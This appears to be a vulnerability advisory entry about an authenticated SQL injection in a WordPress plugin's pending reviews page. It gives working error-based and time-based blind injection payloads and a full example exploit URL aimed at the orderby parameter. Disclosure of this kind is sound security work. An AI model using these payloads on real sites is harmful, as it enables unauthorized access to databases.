The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue.
Error-based SQLi: orderby=id AND EXTRACTVALUE(4795,CONCAT(0x5c,0x717a627871,(SELECT (ELT(4795=4795,1))),0x7176707071))

Time-based blind SQLi: orderby=id AND (SELECT 1339 FROM (SELECT(SLEEP(5)))Ozmh)

Example request: https://example.com/wp-admin/admin.php?page=fp_admin_pending_reviews_page&order=asc&orderby=id+AND+%28SELECT+1339+FROM+%28SELECT%28SLEEP%285%29%29%29Ozmh%29
bl4derunner
Anton Sarsadskikh
Yes
2021-11-29 (about 5 months ago)
2021-11-29 (about 5 months ago)
2022-04-10 (about 1 month ago)